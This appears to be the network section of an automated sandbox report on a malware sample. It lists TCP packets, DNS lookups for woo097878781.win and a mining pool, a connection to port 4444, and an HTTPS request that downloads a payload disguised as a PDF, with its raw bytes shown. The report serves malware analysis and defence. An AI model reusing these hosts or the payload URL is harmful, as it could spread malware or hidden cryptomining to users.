                                                                                                                                Dec 16, 2024 13:41:39.153882980 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.153945923 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.153954029 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.153997898 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.161163092 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.161185026 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.161247015 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.161252022 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.161299944 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.166726112 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.166743994 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.166795015 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.166800022 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.166836023 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.166853905 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.171145916 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.171165943 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.171209097 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.171214104 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.171255112 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.175640106 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.175662041 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.175704002 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.175709009 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.175741911 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.175766945 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.263055086 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.263128042 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.263159990 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.263178110 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.263196945 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.263219118 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.268570900 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.268588066 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.268655062 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.268678904 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.268719912 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.341121912 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.341144085 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.341214895 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.341223955 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.341268063 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.346683025 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.346700907 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.346757889 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.346781969 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.346826077 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.351700068 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.351716995 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.351756096 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.351769924 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.351799011 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.351815939 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.357563972 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.357580900 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.357642889 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.357669115 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.357707977 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.362986088 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.363018036 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.363058090 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.363084078 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.363100052 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.363120079 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.369560003 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.369605064 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.369630098 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.369652987 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.369672060 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.369692087 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.455342054 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.455377102 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.455497026 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.455529928 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.455579996 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.460835934 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.460850954 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.460946083 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.460952997 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.461007118 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.533430099 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.533456087 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.533550024 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.533571959 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.533617973 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.538944006 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.538960934 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.539022923 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.539031982 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.539077044 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.544637918 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.544653893 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.544727087 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.544737101 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.544780970 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.549686909 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.549705029 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.549778938 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.549788952 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.549838066 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.555169106 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.555186033 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.555231094 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.555239916 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.555277109 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.555296898 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.560878992 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.560894966 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.560960054 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.560966969 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.561012983 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.647829056 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.647861004 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.648067951 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.648093939 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.648148060 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.653244972 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.653264999 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.653364897 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.653383017 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.653429031 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.686294079 CET444449734185.157.162.216192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.725642920 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.725668907 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.725727081 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.725748062 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.725779057 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.725796938 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.731149912 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.731172085 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.731231928 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.731245041 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.731283903 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.736855030 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.736879110 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.736953974 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.736964941 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.737021923 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.741858006 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.741875887 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.741930008 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.741949081 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.741971016 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.741991043 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.747816086 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.747837067 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.747925043 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.747932911 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.747976065 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.753135920 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.753185987 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.753232956 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.753241062 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.753273010 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.753298044 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.840375900 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.840396881 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.840517998 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.840534925 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.840596914 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.846486092 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.846507072 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.846643925 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.846643925 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.846653938 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.846693993 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.886339903 CET497344444192.168.2.7185.157.162.216
                                                                                                                                Dec 16, 2024 13:41:39.918020010 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.918045998 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.918103933 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.918128967 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.918149948 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.918174028 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.923541069 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.923557043 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.923629045 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.923645020 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.923688889 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.929219007 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.929238081 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.929310083 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.929321051 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.929363966 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.934344053 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.934360981 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.934437990 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.934447050 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.934484959 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.939986944 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.940005064 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.940068960 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.940078020 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.940120935 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.944034100 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.944077015 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.944113970 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.944114923 CET44349750154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:39.944145918 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:39.944160938 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:40.028081894 CET49750443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:42:01.641134024 CET444449734185.157.162.216192.168.2.7
                                                                                                                                Dec 16, 2024 13:42:01.683336020 CET497344444192.168.2.7185.157.162.216
                                                                                                                                Dec 16, 2024 13:42:16.908158064 CET49839443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:42:16.908205032 CET44349839154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:42:16.908386946 CET49839443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:42:16.973004103 CET49839443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:42:16.973028898 CET44349839154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:42:18.396346092 CET44349839154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:42:18.397674084 CET49839443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:42:18.397689104 CET44349839154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:42:18.398749113 CET44349839154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:42:18.398941994 CET49839443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:42:18.400671959 CET49839443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:42:18.400746107 CET44349839154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:42:18.400862932 CET49839443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:42:18.400871038 CET44349839154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:42:18.400943995 CET49839443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:42:18.447339058 CET44349839154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:42:18.947628975 CET44349839154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:42:18.947724104 CET44349839154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:42:18.947911024 CET49839443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:42:18.968832970 CET49839443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:42:18.968859911 CET44349839154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:42:23.682728052 CET444449734185.157.162.216192.168.2.7
                                                                                                                                Dec 16, 2024 13:42:23.886570930 CET497344444192.168.2.7185.157.162.216
                                                                                                                                Dec 16, 2024 13:42:26.871804953 CET444449734185.157.162.216192.168.2.7
                                                                                                                                Dec 16, 2024 13:42:27.074073076 CET497344444192.168.2.7185.157.162.216
                                                                                                                                Dec 16, 2024 13:42:47.634841919 CET444449734185.157.162.216192.168.2.7
                                                                                                                                Dec 16, 2024 13:42:47.683547974 CET497344444192.168.2.7185.157.162.216
                                                                                                                                Dec 16, 2024 13:43:09.630275011 CET444449734185.157.162.216192.168.2.7
                                                                                                                                Dec 16, 2024 13:43:09.683748007 CET497344444192.168.2.7185.157.162.216
                                                                                                                                Dec 16, 2024 13:43:16.750186920 CET49956443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:43:16.750237942 CET44349956154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:43:16.750334978 CET49956443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:43:16.758641005 CET49956443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:43:16.758660078 CET44349956154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:43:18.181965113 CET44349956154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:43:18.183190107 CET49956443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:43:18.183226109 CET44349956154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:43:18.184293032 CET44349956154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:43:18.184382915 CET49956443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:43:18.186173916 CET49956443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:43:18.186258078 CET44349956154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:43:18.186335087 CET49956443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:43:18.186352015 CET44349956154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:43:18.277442932 CET49956443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:43:18.740782022 CET44349956154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:43:18.740993977 CET44349956154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:43:18.741172075 CET49956443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:43:18.746398926 CET49956443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:43:18.746476889 CET44349956154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:43:18.746512890 CET49956443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:43:31.668710947 CET444449734185.157.162.216192.168.2.7
                                                                                                                                Dec 16, 2024 13:43:31.886921883 CET497344444192.168.2.7185.157.162.216

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 16, 2024 13:40:58.090365887 CET5703553192.168.2.71.1.1.1
                                                                                                                                Dec 16, 2024 13:40:58.767086029 CET53570351.1.1.1192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:16.995944023 CET5473053192.168.2.71.1.1.1
                                                                                                                                Dec 16, 2024 13:41:17.551939964 CET53547301.1.1.1192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:31.619714975 CET5840353192.168.2.71.1.1.1
                                                                                                                                Dec 16, 2024 13:41:31.758429050 CET53584031.1.1.1192.168.2.7

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Dec 16, 2024 13:40:58.090365887 CET192.168.2.71.1.1.10xd95bStandard query (0)woo097878781.winA (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 13:41:16.995944023 CET192.168.2.71.1.1.10x92c7Standard query (0)pool.hashvault.proA (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 13:41:31.619714975 CET192.168.2.71.1.1.10x168cStandard query (0)pool.hashvault.proA (IP address)IN (0x0001)false

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Dec 16, 2024 13:40:58.767086029 CET1.1.1.1192.168.2.70xd95bNo error (0)woo097878781.win154.216.20.243A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 13:41:17.551939964 CET1.1.1.1192.168.2.70x92c7No error (0)pool.hashvault.pro5.188.137.200A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 13:41:17.551939964 CET1.1.1.1192.168.2.70x92c7No error (0)pool.hashvault.pro37.203.243.102A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 13:41:31.758429050 CET1.1.1.1192.168.2.70x168cNo error (0)pool.hashvault.pro5.188.137.200A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 13:41:31.758429050 CET1.1.1.1192.168.2.70x168cNo error (0)pool.hashvault.pro37.203.243.102A (IP address)IN (0x0001)false

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • woo097878781.win

                                                                                                                                HTTPS Proxied Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.749700154.216.20.2434437280C:\Users\user\Desktop\ZppxPm0ASs.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 12:41:00 UTC91OUTGET /77/uploads/Odavmyskfc.pdf HTTP/1.1
                                                                                                                                Host: woo097878781.win
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-16 12:41:00 UTC263INHTTP/1.1 200 OK
                                                                                                                                Server: nginx
                                                                                                                                Date: Mon, 16 Dec 2024 12:41:00 GMT
                                                                                                                                Content-Type: application/pdf
                                                                                                                                Content-Length: 5665288
                                                                                                                                Last-Modified: Sun, 15 Dec 2024 21:16:41 GMT
                                                                                                                                Connection: close
                                                                                                                                ETag: "675f4739-567208"
                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                2024-12-16 12:41:00 UTC16121INData Raw: c0 f6 84 76 95 87 34 aa e4 e7 46 51 9b 21 60 24 53 46 5d 3f 89 b2 9d 4e e6 09 b9 a7 d7 a1 15 c7 5d 0e b9 15 2f c4 41 4c bc 9f 68 8e eb 7d 40 9b 2a 6f 0b 1c d5 65 33 ec c9 7e 9b 00 6f 85 8f c7 1d 49 92 b6 5b 9b 30 41 f1 a5 2d 6e 8b a3 ab fe 91 aa 41 ac 17 c4 91 be e0 5b b5 19 e3 49 96 e3 fa 50 06 b6 0e 5a 33 c2 d9 aa cc a1 11 44 41 1e bb dd 89 00 cd 85 02 df b3 ce 80 1a d5 43 57 10 a7 da 9f 99 34 77 73 ec 5c 91 5c 64 0e b4 4c c4 3c 57 43 95 ab a4 f7 2c 1a 42 94 54 72 be 37 08 d2 4b 0d 06 d9 16 a9 ca 3f 67 db cd ae 98 e8 bc 10 71 60 7c 42 c8 33 00 e5 80 b9 b3 d9 9b ea 16 5c 9d 38 8b 6e 9d cb e2 77 33 52 f4 8c 09 d8 7c 7c fa d0 27 2a 16 e8 b6 c3 11 23 e5 be 2a c3 fb 2a c9 33 67 d6 91 b8 63 88 22 49 aa c2 41 43 e7 05 af 68 69 05 9b 54 09 6f 92 66 b7 fa 7f 05
                                                                                                                                Data Ascii: v4FQ!`$SF]?N]/ALh}@*oe3~oI[0A-nA[IPZ3DACW4ws\\dL<WC,BTr7K?gq`|B3\8nw3R||'*#**3gc"IAChiTof
